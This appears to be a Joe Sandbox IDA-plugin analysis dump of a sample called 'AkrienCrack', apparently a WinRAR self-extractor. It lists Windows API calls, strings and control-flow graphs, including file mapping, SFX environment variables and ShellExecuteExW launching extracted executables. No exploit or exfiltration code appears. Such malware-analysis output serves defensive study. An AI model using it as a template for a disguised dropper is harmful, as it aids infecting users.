23957 b49104 23955->23957 24199 b49ebf SetEndOfFile 23955->24199 23956->23911 24172 b49d62 23957->24172 23961 b491b1 23958->23961 23961->23956 24200 b41f94 74 API calls 23961->24200 23962 b4914b 23964 b496d0 75 API calls 
23962->23964 23964->23954 23966 b41643 23965->23966 24215 b4c8ca 23966->24215 23969->23825 23971 b4b087 __EH_prolog 23970->23971 23976 b4ea80 80 API calls 23971->23976 23973 b4b099 23977 b4b195 23973->23977 23976->23973 23978 b4b1a7 ___scrt_get_show_window_mode 23977->23978 23981 b50948 23978->23981 23984 b50908 GetCurrentProcess GetProcessAffinityMask 23981->23984 23985 b4b10f 23984->23985 23985->23841 23986->23845 23992 b416d2 23987->23992 23989 b470b9 23989->23856 23990->23857 23991->23859 23993 b416e8 23992->23993 24004 b41740 __vswprintf_c_l 23992->24004 23994 b41711 23993->23994 24005 b46e91 74 API calls __vswprintf_c_l 23993->24005 23996 b41767 23994->23996 24001 b4172d new 23994->24001 23998 b635de 22 API calls 23996->23998 23997 b41707 24006 b46efd 75 API calls 23997->24006 24000 b4176e 23998->24000 24000->24004 24008 b46efd 75 API calls 24000->24008 24001->24004 24007 b46efd 75 API calls 24001->24007 24004->23989 24005->23997 24006->23994 24007->24004 24008->24004 24010 b50c56 __vsnwprintf_l 24009->24010 24010->23864 24012 b5d527 24011->24012 24013 b4ddd1 53 API calls 24012->24013 24014 b5d54a 24013->24014 24015 b4400a _swprintf 51 API calls 24014->24015 24016 b5d55c 24015->24016 24017 b5cb5a 16 API calls 24016->24017 24018 b51372 24017->24018 24018->23819 24020 b41961 24019->24020 24022 b4195d 24019->24022 24023 b41896 24020->24023 24022->23869 24024 b418a8 24023->24024 24025 b418e5 24023->24025 24026 b43aac 97 API calls 24024->24026 24031 b43f18 24025->24031 24029 b418c8 24026->24029 24029->24022 24032 b43f21 24031->24032 24033 b43aac 97 API calls 24032->24033 24034 b41906 24032->24034 24048 b5067c 24032->24048 24033->24032 24034->24029 24036 b41e00 24034->24036 24037 b41e0a __EH_prolog 24036->24037 24056 b43b3d 24037->24056 24039 b41e34 24040 b416d2 76 API calls 24039->24040 24041 b41ebb 24039->24041 24042 b41e4b 24040->24042 24041->24029 24084 b41849 76 API calls 24042->24084 24044 b41e63 24046 b41e6f 24044->24046 24085 b5137a MultiByteToWideChar 
24044->24085 24086 b41849 76 API calls 24046->24086 24049 b50683 24048->24049 24050 b5069e 24049->24050 24054 b46e8c RaiseException FindHandler 24049->24054 24052 b506af SetThreadExecutionState 24050->24052 24055 b46e8c RaiseException FindHandler 24050->24055 24052->24032 24054->24050 24055->24052 24057 b43b47 __EH_prolog 24056->24057 24058 b43b5d 24057->24058 24059 b43b79 24057->24059 24115 b46dc1 74 API calls 24058->24115 24060 b43dc2 24059->24060 24064 b43ba5 24059->24064 24132 b46dc1 74 API calls 24060->24132 24063 b43b68 24063->24039 24064->24063 24087 b52c42 24064->24087 24066 b43c26 24067 b43cb1 24066->24067 24083 b43c1d 24066->24083 24118 b4c991 24066->24118 24100 b4aa88 24067->24100 24068 b43c22 24068->24066 24117 b42034 76 API calls 24068->24117 24070 b43bf4 24070->24066 24070->24068 24071 b43c12 24070->24071 24116 b46dc1 74 API calls 24071->24116 24075 b43cc4 24077 b43d3e 24075->24077 24078 b43d48 24075->24078 24104 b492e6 24077->24104 24124 b528f1 121 API calls 24078->24124 24081 b43d46 24081->24083 24125 b41f94 74 API calls 24081->24125 24126 b51acf 24083->24126 24084->24044 24085->24046 24086->24041 24088 b52c51 24087->24088 24090 b52c5b 24087->24090 24133 b46efd 75 API calls 24088->24133 24091 b52ca2 new 24090->24091 24093 b52c9d Concurrency::cancel_current_task 24090->24093 24099 b52cfd ___scrt_get_show_window_mode 24090->24099 24092 b52da9 Concurrency::cancel_current_task 24091->24092 24094 b52cd9 24091->24094 24091->24099 24136 b6157a RaiseException 24092->24136 24135 b6157a RaiseException 24093->24135 24134 b52b7b 75 API calls 4 library calls 24094->24134 24098 b52dc1 24099->24070 24101 b4aa95 24100->24101 24103 b4aa9f 24100->24103 24102 b5e24a new 8 API calls 24101->24102 24102->24103 24103->24075 24105 b492f0 __EH_prolog 24104->24105 24137 b47dc6 24105->24137 24108 b4709d 76 API calls 24109 b49302 24108->24109 24140 b4ca6c 24109->24140 24111 b4935c 24111->24081 24113 b4ca6c 114 API calls 24114 b49314 24113->24114 24114->24111 24114->24113 24149 
b4cc51 97 API calls __vswprintf_c_l 24114->24149 24115->24063 24116->24083 24117->24066 24119 b4c9c4 24118->24119 24120 b4c9b2 24118->24120 24151 b46249 80 API calls 24119->24151 24150 b46249 80 API calls 24120->24150 24123 b4c9bc 24123->24067 24124->24081 24125->24083 24127 b51ad9 24126->24127 24128 b51af2 24127->24128 24131 b51b06 24127->24131 24152 b5075b 84 API calls 24128->24152 24130 b51af9 24130->24131 24132->24063 24133->24090 24134->24099 24135->24092 24136->24098 24138 b4acf5 GetVersionExW 24137->24138 24139 b47dcb 24138->24139 24139->24108 24146 b4ca82 __vswprintf_c_l 24140->24146 24141 b4cbf7 24142 b4cc1f 24141->24142 24143 b4ca0b 6 API calls 24141->24143 24144 b5067c SetThreadExecutionState RaiseException 24142->24144 24143->24142 24147 b4cbee 24144->24147 24145 b584bd 99 API calls 24145->24146 24146->24141 24146->24145 24146->24147 24148 b4ab70 89 API calls 24146->24148 24147->24114 24148->24146 24149->24114 24150->24123 24151->24123 24152->24130 24153->23879 24154->23879 24155->23880 24157 b45e4a 24156->24157 24201 b45d67 24157->24201 24159 b45eb5 24159->23892 24160 b45e7d 24160->24159 24206 b4ad65 CharUpperW CompareStringW 24160->24206 24163 b48289 24162->24163 24212 b5179d CharUpperW 24163->24212 24165 b48333 24165->23895 24167 b47d7b 24166->24167 24168 b47dbb 24167->24168 24213 b47043 74 API calls 24167->24213 24168->23908 24170 b47db3 24214 b46dc1 74 API calls 24170->24214 24173 b49d73 24172->24173 24175 b49d82 24172->24175 24174 b49d79 FlushFileBuffers 24173->24174 24173->24175 24174->24175 24176 b49dfb SetFileTime 24175->24176 24176->23962 24177->23884 24178->23887 24179->23900 24180->23908 24181->23908 24182->23901 24183->23916 24184->23907 24185->23916 24187 b49992 GetFileType 24186->24187 24188 b4998f 24186->24188 24189 b499a0 24187->24189 24188->23922 24189->23922 24190->23926 24191->23929 24192->23932 24193->23952 24194->23952 24195->23952 24196->23952 24197->23952 24198->23955 24199->23957 24200->23956 24207 b45c64 24201->24207 24203 

              Control-flow Graph

              APIs
                • Part of subcall function 00B500CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00B500E4
                • Part of subcall function 00B500CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B500F6
                • Part of subcall function 00B500CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B50127
                • Part of subcall function 00B59DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B59DAC
                • Part of subcall function 00B5A335: OleInitialize.OLE32(00000000), ref: 00B5A34E
                • Part of subcall function 00B5A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B5A385
                • Part of subcall function 00B5A335: SHGetMalloc.SHELL32(00B88430), ref: 00B5A38F
                • Part of subcall function 00B513B3: GetCPInfo.KERNEL32(00000000,?), ref: 00B513C4
                • Part of subcall function 00B513B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00B513D8
              • GetCommandLineW.KERNEL32 ref: 00B5D61C
              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B5D643
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B5D654
              • UnmapViewOfFile.KERNEL32(00000000), ref: 00B5D68E
                • Part of subcall function 00B5D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B5D29D
                • Part of subcall function 00B5D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B5D2D9
              • CloseHandle.KERNEL32(00000000), ref: 00B5D697
              • GetModuleFileNameW.KERNEL32(00000000,00B9DC90,00000800), ref: 00B5D6B2
              • SetEnvironmentVariableW.KERNEL32(sfxname,00B9DC90), ref: 00B5D6BE
              • GetLocalTime.KERNEL32(?), ref: 00B5D6C9
              • _swprintf.LIBCMT ref: 00B5D708
              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B5D71A
              • GetModuleHandleW.KERNEL32(00000000), ref: 00B5D721
              • LoadIconW.USER32(00000000,00000064), ref: 00B5D738
              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00B5D789
              • Sleep.KERNEL32(?), ref: 00B5D7B7
              • DeleteObject.GDI32 ref: 00B5D7F0
              • DeleteObject.GDI32(?), ref: 00B5D800
              • CloseHandle.KERNEL32 ref: 00B5D843
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
              • API String ID: 788466649-2070194233
              • Opcode ID: 88ebc35d6c3b1d62e7c6473b047ca449f1e9063f6efd6424f25aec12f84225a3
              • Instruction ID: ec5e3f732fa32357cb629f10a2741b4f87787df4af8f69618d6b6205920d3d96
              • Opcode Fuzzy Hash: 88ebc35d6c3b1d62e7c6473b047ca449f1e9063f6efd6424f25aec12f84225a3
              • Instruction Fuzzy Hash: EE61B471900241AFD730AF65EC4AF2A37E8EB49742F4405E9F949A32B1DF74C948C762

              Control-flow Graph

              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B4A4EF,000000FF,?,?), ref: 00B4A628
              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B4A4EF,000000FF,?,?), ref: 00B4A65E
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B4A4EF,000000FF,?,?), ref: 00B4A66A
              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00B4A4EF,000000FF,?,?), ref: 00B4A692
              • GetLastError.KERNEL32(?,?,?,?,00B4A4EF,000000FF,?,?), ref: 00B4A69E
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FileFind$ErrorFirstLast$Next
              • String ID:
              • API String ID: 869497890-0
              • Opcode ID: 033ab577b5782769f3d12c913d544421b1636acfabfd220707ccfbbc1db962bb
              • Instruction ID: 3355aab5916b45597df205c2fa67b2a9f97d472b9a58177982bdb5cdf36f22a8
              • Opcode Fuzzy Hash: 033ab577b5782769f3d12c913d544421b1636acfabfd220707ccfbbc1db962bb
              • Instruction Fuzzy Hash: 22417472505241AFC724EF68C8C4ADAF7E8FF48350F050A6DF999D3240D734AA949B92
              APIs
              • GetCurrentProcess.KERNEL32(00000000,?,00B67513,00000000,00B7BAD8,0000000C,00B6766A,00000000,00000002,00000000), ref: 00B6755E
              • TerminateProcess.KERNEL32(00000000,?,00B67513,00000000,00B7BAD8,0000000C,00B6766A,00000000,00000002,00000000), ref: 00B67565
              • ExitProcess.KERNEL32 ref: 00B67577
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: e03a39224713e99efeea71b3b3aca892d118c71a651d60a15e2b6673f7137c19
              • Instruction ID: f8c060bd418ac086d97db60cff76480550274491dee48c06198ae94be79ea579
              • Opcode Fuzzy Hash: e03a39224713e99efeea71b3b3aca892d118c71a651d60a15e2b6673f7137c19
              • Instruction Fuzzy Hash: F2E0B631054548EBCF11FF64DD19A493BA9EB50B45F1084A4F94A9B232CF39DE82DB50
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID:
              • API String ID: 3004599000-0
              • Opcode ID: 349c11b90499d62f9d5fd2ad1f0763f9f1d767f2227b79c19fb0b0066e1ce747
              • Instruction ID: 913be2ed8e7535c69a9c196a843805651b72f12bf14eb934d5edf221b10c2ba1
              • Opcode Fuzzy Hash: 349c11b90499d62f9d5fd2ad1f0763f9f1d767f2227b79c19fb0b0066e1ce747
              • Instruction Fuzzy Hash: 7A820870904245AEDF25DB64C895BFEBBF9EF05300F0841FAE959AB142DB315B48EB60
              APIs
              • __EH_prolog.LIBCMT ref: 00B5AEE5
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prologItemTextWindow
              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
              • API String ID: 810644672-3513413516

              Control-flow Graph

              APIs
              • GetModuleHandleW.KERNEL32(kernel32), ref: 00B500E4
              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B500F6
              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B50127
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B503D4
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B503F0
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B50402
              • ReadFile.KERNEL32(00000000,?,00007FFE,00B73BA4,00000000), ref: 00B50421
              • CloseHandle.KERNEL32(00000000), ref: 00B50479
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B5048F
              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00B504E7
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00B50510
              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00B5054A
                • Part of subcall function 00B50085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B500A0
                • Part of subcall function 00B50085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B4EB86,Crypt32.dll,00000000,00B4EC0A,?,?,00B4EBEC,?,?,?), ref: 00B500C2
              • _swprintf.LIBCMT ref: 00B505BE
              • _swprintf.LIBCMT ref: 00B5060A
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
              • AllocConsole.KERNEL32 ref: 00B50612
              • GetCurrentProcessId.KERNEL32 ref: 00B5061C
              • AttachConsole.KERNEL32(00000000), ref: 00B50623
              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B50649
              • WriteConsoleW.KERNEL32(00000000), ref: 00B50650
              • Sleep.KERNEL32(00002710), ref: 00B5065B
              • FreeConsole.KERNEL32 ref: 00B50661
              • ExitProcess.KERNEL32 ref: 00B50669
              Strings
              Similarity
              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
              • API String ID: 1201351596-3298887752

              Control-flow Graph

              APIs
              • __EH_prolog.LIBCMT ref: 00B5BDFA
                • Part of subcall function 00B5AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B5AAFE
              • SetWindowTextW.USER32(?,?), ref: 00B5C127
              • _wcsrchr.LIBVCRUNTIME ref: 00B5C2B1
              • GetDlgItem.USER32(?,00000066), ref: 00B5C2EC
              • SetWindowTextW.USER32(00000000,?), ref: 00B5C2FC
              • SendMessageW.USER32(00000000,00000143,00000000,00B8A472), ref: 00B5C30A
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B5C335
              Strings
              Similarity
              • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
              • API String ID: 3564274579-312220925

              Control-flow Graph

              APIs
              • __EH_prolog.LIBCMT ref: 00B4D346
              • _wcschr.LIBVCRUNTIME ref: 00B4D367
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00B4D328,?), ref: 00B4D382
              • __fprintf_l.LIBCMT ref: 00B4D873
                • Part of subcall function 00B5137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B4B652,00000000,?,?,?,000501F6), ref: 00B51396
              Strings
              Similarity
              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
              • API String ID: 4184910265-980926923

              Control-flow Graph

              APIs
                • Part of subcall function 00B5AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5AC85
                • Part of subcall function 00B5AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5AC96
                • Part of subcall function 00B5AC74: IsDialogMessageW.USER32(000501F6,?), ref: 00B5ACAA
                • Part of subcall function 00B5AC74: TranslateMessage.USER32(?), ref: 00B5ACB8
                • Part of subcall function 00B5AC74: DispatchMessageW.USER32(?), ref: 00B5ACC2
              • GetDlgItem.USER32(00000068,00B9ECB0), ref: 00B5CB6E
              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00B5A632,00000001,?,?,00B5AECB,00B74F88,00B9ECB0), ref: 00B5CB96
              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B5CBA1
              • SendMessageW.USER32(00000000,000000C2,00000000,00B735B4), ref: 00B5CBAF
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B5CBC5
              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B5CBDF
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B5CC23
              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B5CC31
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B5CC40
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B5CC67
              • SendMessageW.USER32(00000000,000000C2,00000000,00B7431C), ref: 00B5CC76
              Strings
              Similarity
              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
              • String ID: \
              • API String ID: 3569833718-2967466578

              Control-flow Graph

              APIs
              • FindResourceW.KERNEL32(00B5AE4D,PNG,?,?,?,00B5AE4D,00000066), ref: 00B59E2E
              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E46
              • LoadResource.KERNEL32(00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E59
              • LockResource.KERNEL32(00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E64
              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B5AE4D,00000066), ref: 00B59E82
              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00B5AE4D,00000066), ref: 00B59E93
              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B59EFC
              • GlobalUnlock.KERNEL32(00000000), ref: 00B59F1B
              • GlobalFree.KERNEL32(00000000), ref: 00B59F22
              Strings
              Similarity
              • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
              • String ID: PNG
              • API String ID: 4097654274-364855578

              Control-flow Graph

              APIs
              • ShellExecuteExW.SHELL32(?), ref: 00B5CF54
              • ShowWindow.USER32(?,00000000), ref: 00B5CF93
              • GetExitCodeProcess.KERNEL32(?,?), ref: 00B5CFCF
              • CloseHandle.KERNEL32(?), ref: 00B5CFF5
              • ShowWindow.USER32(?,00000001), ref: 00B5D084
                • Part of subcall function 00B517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B4BB05,00000000,.exe,?,?,00000800,?,?,00B585DF,?), ref: 00B517C2
              Strings
              Similarity
              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
              • String ID: $.exe$.inf
              • API String ID: 3686203788-2452507128

              Control-flow Graph

              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B64E35,00B64E35,?,?,?,00B6A2A9,00000001,00000001,3FE85006), ref: 00B6A0B2
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B6A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00B6A138
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B6A232
              • __freea.LIBCMT ref: 00B6A23F
                • Part of subcall function 00B68518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B6C13D,00000000,?,00B667E2,?,00000008,?,00B689AD,?,?,?), ref: 00B6854A
              • __freea.LIBCMT ref: 00B6A248
              • __freea.LIBCMT ref: 00B6A26D
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID:

              APIs
                • Part of subcall function 00B50085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B500A0
                • Part of subcall function 00B50085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B4EB86,Crypt32.dll,00000000,00B4EC0A,?,?,00B4EBEC,?,?,?), ref: 00B500C2
              • OleInitialize.OLE32(00000000), ref: 00B5A34E
              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B5A385
              • SHGetMalloc.SHELL32(00B88430), ref: 00B5A38F
              Similarity
              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
              • String ID: riched20.dll$3To

              Control-flow Graph

              control_flow_graph 940 b499b0-b499d1 call b5e360 943 b499d3-b499d6 940->943 944 b499dc 940->944 943->944 945 b499d8-b499da 943->945 946 b499de-b499fb 944->946 945->946 947 b49a03-b49a0d 946->947 948 b499fd 946->948 949 b49a12-b49a31 call b470bf 947->949 950 b49a0f 947->950 948->947 953 b49a33 949->953 954 b49a39-b49a57 CreateFileW 949->954 950->949 953->954 955 b49a59-b49a7b GetLastError call b4b66c 954->955 956 b49abb-b49ac0 954->956 965 b49a7d-b49a9f CreateFileW GetLastError 955->965 966 b49aaa-b49aaf 955->966 957 b49ae1-b49af5 956->957 958 b49ac2-b49ac5 956->958 961 b49af7-b49b0f call b4fe56 957->961 962 b49b13-b49b1e 957->962 958->957 960 b49ac7-b49adb SetFileTime 958->960 960->957 961->962 968 b49aa5-b49aa8 965->968 969 b49aa1 965->969 966->956 970 b49ab1 966->970 968->956 968->966 969->968 970->956
              APIs
              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00B478AD,?,00000005,?,00000011), ref: 00B49A4C
              • GetLastError.KERNEL32(?,?,00B478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B49A59
              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00B478AD,?,00000005,?), ref: 00B49A8E
              • GetLastError.KERNEL32(?,?,00B478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B49A96
              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B49ADB
              Similarity
              • API ID: File$CreateErrorLast$Time
              • String ID:

              Control-flow Graph

              control_flow_graph 999 b5ac74-b5ac8d PeekMessageW 1000 b5ac8f-b5aca3 GetMessageW 999->1000 1001 b5acc8-b5accc 999->1001 1002 b5aca5-b5acb2 IsDialogMessageW 1000->1002 1003 b5acb4-b5acc2 TranslateMessage DispatchMessageW 1000->1003 1002->1001 1002->1003 1003->1001
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5AC85
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5AC96
              • IsDialogMessageW.USER32(000501F6,?), ref: 00B5ACAA
              • TranslateMessage.USER32(?), ref: 00B5ACB8
              • DispatchMessageW.USER32(?), ref: 00B5ACC2
              Similarity
              • API ID: Message$DialogDispatchPeekTranslate
              • String ID:

              Control-flow Graph

              control_flow_graph 1004 b5a2c7-b5a2e6 GetClassNameW 1005 b5a30e-b5a310 1004->1005 1006 b5a2e8-b5a2fd call b517ac 1004->1006 1008 b5a312-b5a315 SHAutoComplete 1005->1008 1009 b5a31b-b5a31f 1005->1009 1011 b5a30d 1006->1011 1012 b5a2ff-b5a30b FindWindowExW 1006->1012 1008->1009 1011->1005 1012->1011
              APIs
              • GetClassNameW.USER32(?,?,00000050), ref: 00B5A2DE
              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B5A315
                • Part of subcall function 00B517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B4BB05,00000000,.exe,?,?,00000800,?,?,00B585DF,?), ref: 00B517C2
              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B5A305
              Similarity
              • API ID: AutoClassCompareCompleteFindNameStringWindow
              • String ID: EDIT

              Control-flow Graph

